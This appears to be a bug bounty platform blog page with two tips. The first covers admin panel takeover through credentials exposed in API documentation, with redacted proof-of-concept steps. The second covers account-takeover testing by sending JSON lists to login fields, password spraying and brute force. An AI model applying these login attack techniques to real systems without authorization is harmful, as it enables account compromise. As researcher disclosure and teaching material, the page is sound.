Bug Bounty Tips: API Documentation Bugs for Administrator Panel Takeovers

Bug Bounty Tips: API Documentation Bugs for Administrator Panel Takeovers

In this bug bounty journey, RootBakar has unearthed a significant vulnerability on an Indonesian website. Without further delay, let’s delve into the intricacies of the bug, its repercussions, and the serendipity that led to its discovery.

Bug Discovery:

During this exploration, RootBakar identified a vulnerability enabling a malicious user to acquire valid credentials disclosed through the API Documentation.

Typically, API Documentation imparts knowledge to users solely on how to send requests to specific endpoints. However, in this distinctive scenario, RootBakar discovered that the API Documentation included usernames and passwords. Using these credentials granted access to the website, ultimately resulting in the takeover of the website with the authority of an administrator.


Administrator Panel Takeover

Proof of concept:

  1. Navigate to the API Documentation link on the website.
  2. Conduct a keyword search in the API Documentation, such as username or password.
  3. Multiple usernames and passwords are discernible in the API Documentation.
  4. Notably, the username [email protected] and password redacted are among them.
  5. Log in to the website using these credentials.
  6. Successfully log in and gain access as an administrator.


  1. The provided credentials carry the role of an administrator.
  2. Always scrutinize usernames and passwords provided in API Documentation.

This comprehensive account encapsulates the essence of RootBakar’s findings. May this disclosure prove invaluable and serve as inspiration for fellow bug hunters. Constructive critiques and feedback from the bug hunting community are eagerly welcomed.

A tip from BugBounter for bug bounty hunters: would you like to be featured on social media with your bug bounty tip? – Sign up on BugBounter, and contact us with your bug bounty tip.

Bir başlık ekleyin (10)

Bug Bounty Tip: Utilizing JSON and Lists for ATO Testing

Bug Bounty Tip: Utilizing JSON and Lists for ATO Testing

The bug bounty tip of this week comes from Mohamed Reda.

When testing a login functionality during a bug bounty program, utilizing JSON and lists can help uncover potential Account Takeover (ATO) vulnerabilities. This technique involves manipulating the request payload to test the system’s response to list-type inputs.


1. Modify Request Body

Change the request body to JSON format and structure it to accept lists for the email and password fields.

    "email": "email",
    "password": "password"

    "email": [
    "password": [

2. Test for ATO Vulnerabilities

a. Single Password Test

  • Utilize a list of emails and try a single password across all emails. Verify if any email-password combination allows successful login.

b. Brute Force Test

  • Use a list of emails and a list of passwords.
  • Employ an Intruder tool to systematically perform a brute force attack.
  • Check for successful logins using different email and password combinations.

Please Note

Always conduct security testing within the scope of the bug bounty program and with explicit authorization. Respect ethical guidelines and adhere to responsible disclosure practices when identifying and reporting vulnerabilities.

This approach helps uncover potential vulnerabilities in the login process, ensuring a thorough security assessment and contributing to a more secure system.

Get Popular with BugBounter!

Get featured on BugBounter with your bug bounty tip. Sign up on BugBounter as a cybersecurity researcher today, and contact our Community Manager Salih with your username on BugBounter via their email, [email protected].